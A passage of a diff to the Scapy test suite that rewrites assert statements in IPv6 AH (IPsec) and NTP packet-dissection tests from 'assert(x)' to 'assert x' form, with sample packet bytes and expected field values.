+assert e.src == '11::22' and e.dst == '22::11' * the encrypted packet should have an AH layer -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.hlim = 2 @@ -3874,7 +3874,7 @@ d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / AH - Transport - SHA2-256-128 - altered packet @@ -3891,13 +3891,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' * the encrypted packet should have an AH layer -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -3905,7 +3905,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3925,13 +3925,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.hlim = 2 @@ -3941,7 +3941,7 @@ d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d == p) +assert d == p ####################################### = IPv6 / AH - Tunnel - HMAC-SHA1-96 - altered packet @@ -3959,13 +3959,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.src = 'cc::ee' @@ -3973,7 +3973,7 @@ e.src = 'cc::ee' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3993,13 +3993,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.hlim = 2 @@ -4009,7 +4009,7 @@ d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d == p) +assert d == p ####################################### = IPv6 / AH - Tunnel - SHA2-256-128 - altered packet @@ -4027,13 +4027,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.src = 'cc::ee' @@ -4041,7 +4041,7 @@ e.src = 'cc::ee' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -4068,10 +4068,10 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(e.src == '11::22' and e.dst == '22::11') +assert e.src == '11::22' and e.dst == '22::11' * AH header should be inserted between the routing header and the dest options header -assert(isinstance(e[AH].underlayer, IPv6ExtHdrRouting)) -assert(isinstance(e[AH].payload, IPv6ExtHdrDestOpt)) +assert isinstance(e[AH].underlayer, IPv6ExtHdrRouting) +assert isinstance(e[AH].payload, IPv6ExtHdrDestOpt) ####################################### = IPv6 + Routing Header / AH - Transport @@ -4090,10 +4090,10 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(e.src == '11::22' and e.dst == '22::11') +assert e.src == '11::22' and e.dst == '22::11' * AH header should be inserted between the routing header and TCP -assert(isinstance(e[AH].underlayer, IPv6ExtHdrRouting)) -assert(isinstance(e[AH].payload, TCP)) +assert isinstance(e[AH].underlayer, IPv6ExtHdrRouting) +assert isinstance(e[AH].payload, TCP) * reorder the routing header as the receiver will get it final = e[IPv6ExtHdrRouting].addresses.pop() diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 4e89dc40d4e..255415ba695 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -20,28 +20,28 @@ assert isinstance(pkt.getlayer(NTP), NTPHeader) = NTP - Layers (1) p = NTPHeader() -assert(NTPHeader in p) -assert(not NTPControl in p) -assert(not NTPPrivate in p) -assert(NTP in p) +assert NTPHeader in p +assert not NTPControl in p +assert not NTPPrivate in p +assert NTP in p p = NTPControl() -assert(not NTPHeader in p) -assert(NTPControl in p) -assert(not NTPPrivate in p) -assert(NTP in p) +assert not NTPHeader in p +assert NTPControl in p +assert not NTPPrivate in p +assert NTP in p p = NTPPrivate() -assert(not NTPHeader in p) -assert(not NTPControl in p) -assert(NTPPrivate in p) -assert(NTP in p) +assert not NTPHeader in p +assert not NTPControl in p +assert NTPPrivate in p +assert NTP in p = NTP - Layers (2) p = NTPHeader() -assert(type(p[NTP]) == NTPHeader) +assert type(p[NTP]) == NTPHeader p = NTPControl() -assert(type(p[NTP]) == NTPControl) +assert type(p[NTP]) == NTPControl p = NTPPrivate() -assert(type(p[NTP]) == NTPPrivate) +assert type(p[NTP]) == NTPPrivate = NTP - sessions (1) p = IP()/TCP()/NTP() @@ -66,9 +66,9 @@ len(raw(NTP())) == 48 = NTPHeader - Dissection s = b"!\x0b\x06\xea\x00\x00\x00\x00\x00\x00\xf2\xc1\x7f\x7f\x01\x00\xdb9\xe8\xa21\x02\xe6\xbc\xdb9\xe8\x81\x02U8\xef\xdb9\xe8\x80\xdcl+\x06\xdb9\xe8\xa91\xcbI\xbf\x00\x00\x00\x01\xady\xf3\xa1\xe5\xfc\xd02\xd2j\x1e'\xc3\xc1\xb6\x0e" p = NTP(s) -assert(isinstance(p, NTPHeader)) -assert(p[NTPAuthenticator].key_id == 1) -assert(bytes_hex(p[NTPAuthenticator].dgst) == b'ad79f3a1e5fcd032d26a1e27c3c1b60e') +assert isinstance(p, NTPHeader) +assert p[NTPAuthenticator].key_id == 1 +assert bytes_hex(p[NTPAuthenticator].dgst) == b'ad79f3a1e5fcd032d26a1e27c3c1b60e' = NTPHeader - High precision pkt = NTP(b'#\x02\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xe3\xaaz\xf7\xb4\x07\xaa\xea\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f+\xe2X>\xb8\x00') @@ -78,22 +78,22 @@ assert str(pkt.orig) == '3819600631.703241999' = NTPHeader - KoD s = b'\xe4\x00\x06\xe8\x00\x00\x00\x00\x00\x00\x02\xcaINIT\x00\x00\x00\x00\x00\x00\x00\x00\xdb@\xe3\x9eH\xa3pj\xdb@\xe3\x9eH\xf0\xc3\\\xdb@\xe3\x9eH\xfaL\xac\x00\x00\x00\x01B\x86)\xc1Q4\x8bW8\xe7Q\xda\xd0Z\xbc\xb8' p = NTP(s) -assert(isinstance(p, NTPHeader)) -assert(p.leap == 3) -assert(p.version == 4) -assert(p.mode == 4) -assert(p.stratum == 0) -assert(p.ref_id == b'INIT') +assert isinstance(p, NTPHeader) +assert p.leap == 3 +assert p.version == 4 +assert p.mode == 4 +assert p.stratum == 0 +assert p.ref_id == b'INIT' = NTPHeader - Extension dissection test s = b'#\x02\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xdbM\xdf\x19e\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdbM\xdf\x19e\x89\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPHeader)) -assert(p.leap == 0) -assert(p.version == 4) -assert(p.mode == 3) -assert(p.stratum == 2) +assert isinstance(p, NTPHeader) +assert p.leap == 0 +assert p.version == 4 +assert p.mode == 3 +assert p.stratum == 2 = NTPAuthenticator @@ -109,290 +109,290 @@ assert NTPAuthenticator in p and p[NTPAuthenticator].key_id == 3452142173 = NTP Control (mode 6) - CTL_OP_READSTAT (1) - request s = b'\x16\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 1) -assert(p.sequence == 12) -assert(p.status == 0) -assert(p.association_id == 0) -assert(p.offset == 0) -assert(p.count == 0) -assert(p.data == b'') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 1 +assert p.sequence == 12 +assert p.status == 0 +assert p.association_id == 0 +assert p.offset == 0 +assert p.count == 0 +assert p.data == b'' = NTP Control (mode 6) - CTL_OP_READSTAT (2) - response s = b'\x16\x81\x00\x0c\x06d\x00\x00\x00\x00\x00\x04\xe5\xfc\xf6$' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 1) -assert(p.sequence == 12) -assert(isinstance(p.status_word, NTPSystemStatusPacket)) -assert(p.status_word.leap_indicator == 0) -assert(p.status_word.clock_source == 6) -assert(p.status_word.system_event_counter == 6) -assert(p.status_word.system_event_code == 4) -assert(p.association_id == 0) -assert(p.offset == 0) -assert(p.count == 4) -assert(isinstance(p.data, NTPPeerStatusDataPacket)) -assert(p.data.association_id == 58876) -assert(isinstance(p.data.peer_status, NTPPeerStatusPacket)) -assert(p.data.peer_status.configured == 1) -assert(p.data.peer_status.auth_enabled == 1) -assert(p.data.peer_status.authentic == 1) -assert(p.data.peer_status.reachability == 1) -assert(p.data.peer_status.reserved == 0) -assert(p.data.peer_status.peer_sel == 6) -assert(p.data.peer_status.peer_event_counter == 2) -assert(p.data.peer_status.peer_event_code == 4) +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 1 +assert p.sequence == 12 +assert isinstance(p.status_word, NTPSystemStatusPacket) +assert p.status_word.leap_indicator == 0 +assert p.status_word.clock_source == 6 +assert p.status_word.system_event_counter == 6 +assert p.status_word.system_event_code == 4 +assert p.association_id == 0 +assert p.offset == 0 +assert p.count == 4 +assert isinstance(p.data, NTPPeerStatusDataPacket) +assert p.data.association_id == 58876 +assert isinstance(p.data.peer_status, NTPPeerStatusPacket) +assert p.data.peer_status.configured == 1 +assert p.data.peer_status.auth_enabled == 1 +assert p.data.peer_status.authentic == 1 +assert p.data.peer_status.reachability == 1 +assert p.data.peer_status.reserved == 0 +assert p.data.peer_status.peer_sel == 6 +assert p.data.peer_status.peer_event_counter == 2 +assert p.data.peer_status.peer_event_code == 4 = NTP Control (mode 6) - CTL_OP_READVAR (1) - request s = b'\x16\x02\x00\x12\x00\x00\xfc\x8f\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.op_code == 2) -assert(p.sequence == 18) -assert(p.status == 0) -assert(p.association_id == 64655) -assert(p.data == b'') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.op_code == 2 +assert p.sequence == 18 +assert p.status == 0 +assert p.association_id == 64655 +assert p.data == b'' = NTP Control (mode 6) - CTL_OP_READVAR (2) - response (1st packet) s = b'\xd6\xa2\x00\x12\xc0\x11\xfc\x8f\x00\x00\x01\xd4srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 1) -assert(p.op_code == 2) -assert(p.sequence == 18) -assert(isinstance(p.status_word, NTPPeerStatusPacket)) -assert(p.status_word.configured == 1) -assert(p.status_word.auth_enabled == 1) -assert(p.status_word.authentic == 0) -assert(p.status_word.reachability == 0) -assert(p.status_word.peer_sel == 0) -assert(p.status_word.peer_event_counter == 1) -assert(p.status_word.peer_event_code == 1) -assert(p.association_id == 64655) -assert(p.offset == 0) -assert(p.count == 468) -assert(p.data.load == b'srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.more == 1 +assert p.op_code == 2 +assert p.sequence == 18 +assert isinstance(p.status_word, NTPPeerStatusPacket) +assert p.status_word.configured == 1 +assert p.status_word.auth_enabled == 1 +assert p.status_word.authentic == 0 +assert p.status_word.reachability == 0 +assert p.status_word.peer_sel == 0 +assert p.status_word.peer_event_counter == 1 +assert p.status_word.peer_event_code == 1 +assert p.association_id == 64655 +assert p.offset == 0 +assert p.count == 468 +assert p.data.load == b'srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ' = NTP Control (mode 6) - CTL_OP_READVAR (3) - response (2nd packet) s = b'\xd6\x82\x00\x12\xc0\x11\xfc\x8f\x01\xd4\x00i0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 2) -assert(p.sequence == 18) -assert(isinstance(p.status_word, NTPPeerStatusPacket)) -assert(p.association_id == 64655) -assert(p.offset == 468) -assert(p.count == 105) -assert(p.data.load == b'0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 2 +assert p.sequence == 18 +assert isinstance(p.status_word, NTPPeerStatusPacket) +assert p.association_id == 64655 +assert p.offset == 468 +assert p.count == 105 +assert p.data.load == b'0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00' = NTP Control (mode 6) - CTL_OP_READVAR (4) - request s = b'\x16\x02\x00\x13\x00\x00s\xb5\x00\x00\x00\x0btest1,test2\x00\x00\x00\x00\x01=\xc2;\xc7\xed\xb9US9\xd6\x89\x08\xc8\xaf\xa6\x12' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 2) -assert(len(p.data.load) == 12) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'3dc23bc7edb9555339d68908c8afa612') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 2 +assert len(p.data.load) == 12 +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'3dc23bc7edb9555339d68908c8afa612' = NTP Control (mode 6) - CTL_OP_READVAR (5) - response s = b'\xd6\xc2\x00\x13\x05\x00s\xb5\x00\x00\x00\x00\x00\x00\x00\x01\x97(\x02I\xdb\xa0s8\xedr(`\xdbJX\n' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 1) -assert(p.more == 0) -assert(p.op_code == 2) -assert(len(p.data.load) == 0) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'97280249dba07338ed722860db4a580a') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 1 +assert p.more == 0 +assert p.op_code == 2 +assert len(p.data.load) == 0 +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'97280249dba07338ed722860db4a580a' = NTP Control (mode 6) - CTL_OP_WRITEVAR (1) - request s = b'\x16\x03\x00\x11\x00\x00\x00\x00\x00\x00\x00\x0btest1,test2\x00\x00\x00\x00\x01\xaf\xf1\x0c\xb4\xc9\x94m\xfcM\x90\tJ\xa1p\x94J' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 3) -assert(len(p.data.load) == 12) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'aff10cb4c9946dfc4d90094aa170944a') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 3 +assert len(p.data.load) == 12 +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'aff10cb4c9946dfc4d90094aa170944a' = NTP Control (mode 6) - CTL_OP_WRITEVAR (2) - response s = b'\xd6\xc3\x00\x11\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80z\x80\xfb\xaf\xc4pg\x98S\xa8\xe5xe\x81\x1c' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 1) -assert(p.more == 0) -assert(p.op_code == 3) -assert(hasattr(p, 'status_word')) -assert(isinstance(p.status_word, NTPErrorStatusPacket)) -assert(p.status_word.error_code == 5) -assert(len(p.data.load) == 0) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'807a80fbafc470679853a8e57865811c') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 1 +assert p.more == 0 +assert p.op_code == 3 +assert hasattr(p, 'status_word') +assert isinstance(p.status_word, NTPErrorStatusPacket) +assert p.status_word.error_code == 5 +assert len(p.data.load) == 0 +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'807a80fbafc470679853a8e57865811c' = NTP Control (mode 6) - CTL_OP_CONFIGURE (1) - request s = b'\x16\x08\x00\x16\x00\x00\x00\x00\x00\x00\x00\x0ccontrolkey 1\x00\x00\x00\x01\xea\xa7\xac\xa8\x1bj\x9c\xdbX\xe1S\r6\xfb\xef\xa4' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 8) -assert(p.count == 12) -assert(p.data.load == b'controlkey 1') -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'eaa7aca81b6a9cdb58e1530d36fbefa4') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 8 +assert p.count == 12 +assert p.data.load == b'controlkey 1' +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'eaa7aca81b6a9cdb58e1530d36fbefa4' = NTP Control (mode 6) - CTL_OP_CONFIGURE (2) - response s = b'\xd6\x88\x00\x16\x00\x00\x00\x00\x00\x00\x00\x12Config Succeeded\r\n\x00\x00\x00\x00\x00\x01\xbf\xa6\xd8_\xf9m\x1e2l)<\xac\xee\xc2\xa59' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 8) -assert(p.count == 18) -assert(p.data.load == b'Config Succeeded\r\n\x00\x00') -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'bfa6d85ff96d1e326c293caceec2a539') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 8 +assert p.count == 18 +assert p.data.load == b'Config Succeeded\r\n\x00\x00' +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'bfa6d85ff96d1e326c293caceec2a539' = NTP Control (mode 6) - CTL_OP_SAVECONFIG (1) - request s = b'\x16\t\x00\x1d\x00\x00\x00\x00\x00\x00\x00\x0fntp.test.2.conf\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc9\xfb\x8a\xbe<`_\xfa6\xd2\x18\xc3\xb7d\x89#' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 9) -assert(p.count == 15) -assert(p.data.load == b'ntp.test.2.conf\x00') -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'c9fb8abe3c605ffa36d218c3b7648923') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 9 +assert p.count == 15 +assert p.data.load == b'ntp.test.2.conf\x00' +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'c9fb8abe3c605ffa36d218c3b7648923' = NTP Control (mode 6) - CTL_OP_SAVECONFIG (2) - response s = b"\xd6\x89\x00\x1d\x00\x00\x00\x00\x00\x00\x00*Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00\x00\x00\x00\x012\xc2\xbaY\xc53\xfe(\xf5P\xe5\xa0\x86\x02\x95\xd9" p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 9) -assert(p.count == 42) -assert(p.data.load == b"Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00") -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'32c2ba59c533fe28f550e5a0860295d9') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 9 +assert p.count == 42 +assert p.data.load == b"Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00" +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'32c2ba59c533fe28f550e5a0860295d9' = NTP Control (mode 6) - CTL_OP_REQ_NONCE (1) - request s = b'\x16\x0c\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 12) -assert(p.data == b'') -assert(p.authenticator == b'') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 12 +assert p.data == b'' +assert p.authenticator == b'' = NTP Control (mode 6) - CTL_OP_REQ_NONCE (2) - response s = b'\xd6\x8c\x00\x07\x00\x00\x00\x00\x00\x00\x00 nonce=db4186a2e1d9022472e24bc9\r\n' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 12) -assert(p.data.load == b'nonce=db4186a2e1d9022472e24bc9\r\n') -assert(p.authenticator == b'') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.more == 0 +assert p.op_code == 12 +assert p.data.load == b'nonce=db4186a2e1d9022472e24bc9\r\n' +assert p.authenticator == b'' = NTP Control (mode 6) - CTL_OP_READ_MRU (1) - request s = b'\x16\n\x00\x08\x00\x00\x00\x00\x00\x00\x00(nonce=db4186a2e1d9022472e24bc9, frags=32' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.op_code == 10) -assert(p.count == 40) -assert(p.data.load == b'nonce=db4186a2e1d9022472e24bc9, frags=32') -assert(p.authenticator == b'') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 0 +assert p.err == 0 +assert p.op_code == 10 +assert p.count == 40 +assert p.data.load == b'nonce=db4186a2e1d9022472e24bc9, frags=32' +assert p.authenticator == b'' = NTP Control (mode 6) - CTL_OP_READ_MRU (2) - response s = b'\xd6\x8a\x00\x08\x00\x00\x00\x00\x00\x00\x00\xe9nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.op_code == 10) -assert(p.count == 233) -assert(p.data.load == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00') -assert(p.authenticator == b'') +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.mode == 6 +assert p.response == 1 +assert p.err == 0 +assert p.op_code == 10 +assert p.count == 233 +assert p.data.load == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' +assert p.authenticator == b'' ############ @@ -402,699 +402,699 @@ assert(p.authenticator == b'') = NTP Private (mode 7) - error - Dissection s = 